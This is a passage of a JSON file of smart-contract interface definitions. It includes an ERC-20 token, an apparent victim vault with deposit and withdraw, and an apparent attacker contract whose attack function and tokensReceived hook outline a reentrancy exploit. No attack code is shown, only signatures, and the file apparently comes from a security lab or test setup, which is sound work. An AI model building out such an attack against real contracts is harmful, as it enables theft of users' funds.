332 | "name": "_value", 333 | "type": "uint256" 334 | } 335 | ], 336 | "name": "transfer", 337 | "outputs": [ 338 | { 339 | "internalType": "bool", 340 | "name": "", 341 | "type": "bool" 342 | } 343 | ], 344 | "stateMutability": "nonpayable", 345 | "type": "function" 346 | }, 347 | { 348 | "anonymous": false, 349 | "inputs": [ 350 | { 351 | "indexed": true, 352 | "internalType": "address", 353 | "name": "from", 354 | "type": "address" 355 | }, 356 | { 357 | "indexed": true, 358 | "internalType": "address", 359 | "name": "to", 360 | "type": "address" 361 | }, 362 | { 363 | "indexed": false, 364 | "internalType": "uint256", 365 | "name": "value", 366 | "type": "uint256" 367 | } 368 | ], 369 | "name": "Transfer", 370 | "type": "event" 371 | }, 372 | { 373 | "inputs": [ 374 | { 375 | "internalType": "address", 376 | "name": "_from", 377 | "type": "address" 378 | }, 379 | { 380 | "internalType": "address", 381 | "name": "_to", 382 | "type": "address" 383 | }, 384 | { 385 | "internalType": "uint256", 386 | "name": "_value", 387 | "type": "uint256" 388 | } 389 | ], 390 | "name": "transferFrom", 391 | "outputs": [ 392 | { 393 | "internalType": "bool", 394 | "name": "", 395 | "type": "bool" 396 | } 397 | ], 398 | "stateMutability": "nonpayable", 399 | "type": "function" 400 | }, 401 | { 402 | "inputs": [ 403 | { 404 | "internalType": "address", 405 | "name": "owner", 406 | "type": "address" 407 | }, 408 | { 409 | "internalType": "address", 410 | "name": "spender", 411 | "type": "address" 412 | } 413 | ], 414 | "name": "allowance", 415 | "outputs": [ 416 | { 417 | "internalType": "uint256", 418 | "name": "", 419 | "type": "uint256" 420 | } 421 | ], 422 | "stateMutability": "view", 423 | "type": "function" 424 | }, 425 | { 426 | "inputs": [ 427 | { 428 | "internalType": "address", 429 | "name": "account", 430 | "type": "address" 431 | } 432 | ], 433 | "name": "balanceOf", 434 | "outputs": [ 435 | { 436 | "internalType": "uint256", 437 | "name": "", 438 | "type": "uint256" 439 | } 440 | ], 441 | "stateMutability": "view", 442 | "type": "function" 443 | }, 444 | { 445 | "inputs": [], 446 | "name": "decimals", 447 | "outputs": [ 448 | { 449 | "internalType": "uint8", 450 | "name": "", 451 | "type": "uint8" 452 | } 453 | ], 454 | "stateMutability": "view", 455 | "type": "function" 456 | }, 457 | { 458 | "inputs": [], 459 | "name": "name", 460 | "outputs": [ 461 | { 462 | "internalType": "string", 463 | "name": "", 464 | "type": "string" 465 | } 466 | ], 467 | "stateMutability": "view", 468 | "type": "function" 469 | }, 470 | { 471 | "inputs": [], 472 | "name": "symbol", 473 | "outputs": [ 474 | { 475 | "internalType": "string", 476 | "name": "", 477 | "type": "string" 478 | } 479 | ], 480 | "stateMutability": "view", 481 | "type": "function" 482 | }, 483 | { 484 | "inputs": [], 485 | "name": "totalSupply", 486 | "outputs": [ 487 | { 488 | "internalType": "uint256", 489 | "name": "", 490 | "type": "uint256" 491 | } 492 | ], 493 | "stateMutability": "view", 494 | "type": "function" 495 | } 496 | ], 497 | "0xa394c22e641004cf0bd13bef73528d4f470423a89cad1d16a32bd32435267d4e": [ 498 | { 499 | "inputs": [ 500 | { 501 | "internalType": "uint256", 502 | "name": "amount", 503 | "type": "uint256" 504 | } 505 | ], 506 | "name": "deposit", 507 | "outputs": [], 508 | "stateMutability": "nonpayable", 509 | "type": "function" 510 | }, 511 | { 512 | "inputs": [ 513 | { 514 | "internalType": "address", 515 | "name": "operator", 516 | "type": "address" 517 | }, 518 | { 519 | "internalType": "address", 520 | "name": "from", 521 | "type": "address" 522 | }, 523 | { 524 | "internalType": "address", 525 | "name": "to", 526 | "type": "address" 527 | }, 528 | { 529 | "internalType": "uint256", 530 | "name": "amount", 531 | "type": "uint256" 532 | }, 533 | { 534 | "internalType": "bytes", 535 | "name": "userData", 536 | "type": "bytes" 537 | }, 538 | { 539 | "internalType": "bytes", 540 | "name": "operatorData", 541 | "type": "bytes" 542 | } 543 | ], 544 | "name": "tokensReceived", 545 | "outputs": [], 546 | "stateMutability": "nonpayable", 547 | "type": "function" 548 | }, 549 | { 550 | "inputs": [ 551 | { 552 | "internalType": "address", 553 | "name": "tokenAddr", 554 | "type": "address" 555 | } 556 | ], 557 | "stateMutability": "nonpayable", 558 | "type": "constructor" 559 | }, 560 | { 561 | "inputs": [ 562 | { 563 | "internalType": "address", 564 | "name": "recipient", 565 | "type": "address" 566 | } 567 | ], 568 | "name": "withdraw", 569 | "outputs": [], 570 | "stateMutability": "nonpayable", 571 | "type": "function" 572 | }, 573 | { 574 | "inputs": [ 575 | { 576 | "internalType": "address", 577 | "name": "", 578 | "type": "address" 579 | } 580 | ], 581 | "name": "amounts", 582 | "outputs": [ 583 | { 584 | "internalType": "uint256", 585 | "name": "", 586 | "type": "uint256" 587 | } 588 | ], 589 | "stateMutability": "view", 590 | "type": "function" 591 | }, 592 | { 593 | "inputs": [], 594 | "name": "token", 595 | "outputs": [ 596 | { 597 | "internalType": "contract IERC20", 598 | "name": "", 599 | "type": "address" 600 | } 601 | ], 602 | "stateMutability": "view", 603 | "type": "function" 604 | } 605 | ], 606 | "0xeaf12dbffab8e47aa1b27e4e9d838ee0b6048bf42f57fc6134a598bc42bfc5bd": [ 607 | { 608 | "inputs": [ 609 | { 610 | "internalType": "uint256", 611 | "name": "amount", 612 | "type": "uint256" 613 | } 614 | ], 615 | "name": "attack", 616 | "outputs": [], 617 | "stateMutability": "nonpayable", 618 | "type": "function" 619 | }, 620 | { 621 | "inputs": [ 622 | { 623 | "internalType": "address", 624 | "name": "", 625 | "type": "address" 626 | }, 627 | { 628 | "internalType": "address", 629 | "name": "from", 630 | "type": "address" 631 | }, 632 | { 633 | "internalType": "address", 634 | "name": "", 635 | "type": "address" 636 | }, 637 | { 638 | "internalType": "uint256", 639 | "name": "", 640 | "type": "uint256" 641 | }, 642 | { 643 | "internalType": "bytes", 644 | "name": "", 645 | "type": "bytes" 646 | }, 647 | { 648 | "internalType": "bytes", 649 | "name": "", 650 | "type": "bytes" 651 | } 652 | ], 653 | "name": "tokensReceived", 654 | "outputs": [], 655 | "stateMutability": "nonpayable", 656 | "type": "function" 657 | }, 658 | { 659 | "inputs": [ 660 | { 661 | "internalType": "address", 662 | "name": "victimAddr", 663 | "type": "address" 664 | }, 665 | { 666 | "internalType": "address", 667 | "name": "tokenAddr", 668 | "type": "address" 669 | } 670 | ], 671 | "stateMutability": "nonpayable", 672 | "type": "constructor" 673 | }, 674 | { 675 | "inputs": [], 676 | "name": "token", 677 | "outputs": [ 678 | { 679 | "internalType": "contract IERC20", 680 | "name": "", 681 | "type": "address" 682 | } 683 | ], 684 | "stateMutability": "view", 685 | "type": "function" 686 | }, 687 | { 688 | "inputs": [], 689 | "name": "victim", 690 | "outputs": [ 691 | { 692 | "internalType": "contract IVictim", 693 | "name": "", 694 | "type": "address" 695 | } 696 | ], 697 | "stateMutability": "view", 698 | "type": "function" 699 | } 700 | ] 701 | } 702 | } --------------------------------------------------------------------------------